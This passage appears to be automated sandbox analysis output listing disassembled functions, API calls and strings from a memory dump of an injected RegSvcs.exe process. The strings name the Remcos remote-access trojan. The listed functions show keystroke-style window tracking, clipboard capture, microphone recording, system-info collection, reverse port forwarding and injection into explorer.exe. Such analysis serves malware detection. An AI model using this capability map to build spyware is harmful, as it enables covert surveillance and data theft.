                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • __freea.LIBCMT ref: 0044AE39
                                    • __freea.LIBCMT ref: 0044AE5E
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                    • String ID: $C$PkGNG
                                    APIs
                                    • API ID: _free
                                    • String ID: \&G$\&G$`&G
                                    Strings
                                    • API ID:
                                    • String ID: 65535$udp
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0040AD38
                                    • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                    • GetForegroundWindow.USER32 ref: 0040AD49
                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                    • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                    • String ID: [${ User has been idle for $ minutes }$]
                                    • API String ID: 911427763-3954389425
                                    • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                    • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                    • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                    • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                    APIs
                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-425784914
                                    • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                    • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                    • __dosmaperr.LIBCMT ref: 0043A8A6
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                    • __dosmaperr.LIBCMT ref: 0043A8E3
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                    • __dosmaperr.LIBCMT ref: 0043A937
                                    • _free.LIBCMT ref: 0043A943
                                    • _free.LIBCMT ref: 0043A94A
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0
                                    • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                    • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                    • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                    • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                    • TranslateMessage.USER32(?), ref: 0040557E
                                    • DispatchMessageA.USER32(?), ref: 00405589
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                    • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                    • Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                    • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                    APIs
                                      • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                    • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                    • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                    • String ID: 0VG$0VG$<$@$Temp
                                    • API String ID: 1704390241-2575729100
                                    • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                    • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                    • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                    • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                    APIs
                                    • OpenClipboard.USER32 ref: 00416941
                                    • EmptyClipboard.USER32 ref: 0041694F
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: !D@
                                    • API String ID: 2172192267-604454484
                                    • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                    • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                    APIs
                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                    • CloseHandle.KERNEL32(?), ref: 00413465
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                    • String ID:
                                    • API String ID: 297527592-0
                                    • Opcode ID: d52479866b96e43482c4aa3c72be572081a765f83d9ebd10744e03b07182f042
                                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                    • Opcode Fuzzy Hash: d52479866b96e43482c4aa3c72be572081a765f83d9ebd10744e03b07182f042
                                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                    • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                    APIs
                                    • _free.LIBCMT ref: 00448135
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00448141
                                    • _free.LIBCMT ref: 0044814C
                                    • _free.LIBCMT ref: 00448157
                                    • _free.LIBCMT ref: 00448162
                                    • _free.LIBCMT ref: 0044816D
                                    • _free.LIBCMT ref: 00448178
                                    • _free.LIBCMT ref: 00448183
                                    • _free.LIBCMT ref: 0044818E
                                    • _free.LIBCMT ref: 0044819C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                    • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                    • API String ID: 3578746661-3604713145
                                    • Opcode ID: b7e545620812273330383cc3efdd9bcfc3879d757bd19d7a259961bf1a4de7a6
                                    • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                    • Opcode Fuzzy Hash: b7e545620812273330383cc3efdd9bcfc3879d757bd19d7a259961bf1a4de7a6
                                    • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                    APIs
                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                    • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                    • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                    • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                    • __fassign.LIBCMT ref: 0044B479
                                    • __fassign.LIBCMT ref: 0044B494
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID: PkGNG
                                    • API String ID: 1324828854-263838557
                                    • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                    • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • Sleep.KERNEL32(00000064), ref: 00417521
                                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateDeleteExecuteShellSleep
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    • API String ID: 1462127192-2001430897
                                    • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                    • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                    • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                    • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 0040749E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                    • API String ID: 2050909247-4242073005
                                    • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                    • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                    • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                    • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                    APIs
                                    • _strftime.LIBCMT ref: 00401D50
                                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                    • API String ID: 3809562944-243156785
                                    • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                    • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                    • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                    • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                    • int.LIBCPMT ref: 00410E81
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                    • String ID: ,kG$0kG
                                    • API String ID: 3815856325-2015055088
                                    • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                    • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                    • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                    • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                    • waveInStart.WINMM ref: 00401CFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID: dMG$|MG$PG
                                    • API String ID: 1356121797-532278878
                                    • Opcode ID: 993692589c413c6f5f0556b0fca4e76cf40985a39ae9ebd2fae1836bdcb2a895
                                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                    • Opcode Fuzzy Hash: 993692589c413c6f5f0556b0fca4e76cf40985a39ae9ebd2fae1836bdcb2a895
                                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                    • TranslateMessage.USER32(?), ref: 0041D4E9
                                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    • API String ID: 1970332568-165870891
                                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                    • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                    • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                    • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                    APIs
                                    • GetCPInfo.KERNEL32(?,?), ref: 00453E2F
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453EB2
                                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453F45
                                    • __alloca_probe_16.LIBCMT ref: 00453F94
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F5C
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FD8
                                    • __freea.LIBCMT ref: 00454003
                                    • __freea.LIBCMT ref: 0045400F
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                    • String ID:
                                    • API String ID: 201697637-0
                                    • Opcode ID: cf0f5bca4b9d7a6a0537f160270e877f32bb2155bdb84350bfddf98010c842c7
                                    • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                    • Opcode Fuzzy Hash: cf0f5bca4b9d7a6a0537f160270e877f32bb2155bdb84350bfddf98010c842c7
                                    • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • _memcmp.LIBVCRUNTIME ref: 00445423
                                    • _free.LIBCMT ref: 00445494
                                    • _free.LIBCMT ref: 004454AD
                                    • _free.LIBCMT ref: 004454DF
                                    • _free.LIBCMT ref: 004454E8
